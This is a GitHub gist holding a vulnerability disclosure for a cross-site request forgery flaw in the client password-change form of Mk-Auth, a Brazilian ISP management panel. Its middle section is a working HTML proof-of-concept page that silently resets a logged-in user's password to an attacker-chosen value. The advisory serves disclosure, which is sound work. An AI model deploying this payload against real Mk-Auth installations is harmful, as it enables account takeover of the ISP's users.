Created
January 3, 2021 19:40
-
-
Save alacerda/98853283be6009e75b7d94968d50b88e to your computer and use it in GitHub Desktop.
Mk-Auth CSRF in Clients Change Password Form
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mk-Auth CSRF in Clients Change Password Form | |
Product Description: | |
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel. | |
Vulnerability Description: | |
It is possible to change a user’s password by enticing a logged user to access a malicious webpage. | |
Additional Information: | |
A malicious actor may craft a web page that, when a user that is authenticated on Mk-Auth (on “central” module), access the page, the user’s password is automatically replaced by one chosen by the attacker. | |
PoC: | |
<html> | |
<body> | |
<script>history.pushState('', '', '/')</script> | |
<form action="http://mkserver/central/executar_central.php?acao=altsenha_princ" method="POST"> | |
<input type="hidden" name="senha" value="123qwe" /> | |
<input type="hidden" name="senha2" value="123qwe" /> | |
<input type="submit" value="Submit request" /> | |
</form> | |
</body> | |
</html> | |
Vulnerability Type: | |
CWE-352: Cross-Site Request Forgery (CSRF) | |
Vendor: | |
Mk-Auth | |
Affected Product: | |
MK-Auth 19.01 :: K4.9 | |
Probably previous are also affected | |
Affected Component: | |
Central: Dados: Trocar Senha | |
Attack Vector: | |
Remote | |
Code Execution: | |
No | |
Attack Vector: | |
An authenticated user must access a malicious web page. | |
Reference: | |
http://mk-auth.com.br/ | |
Discoverer: | |
Alan Lacerda (alacerda) | alacerda[at]intruderlabs.com.br | |
Filipe Cordeiro (sknux) | c_sfilipe[at]outlook.com | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment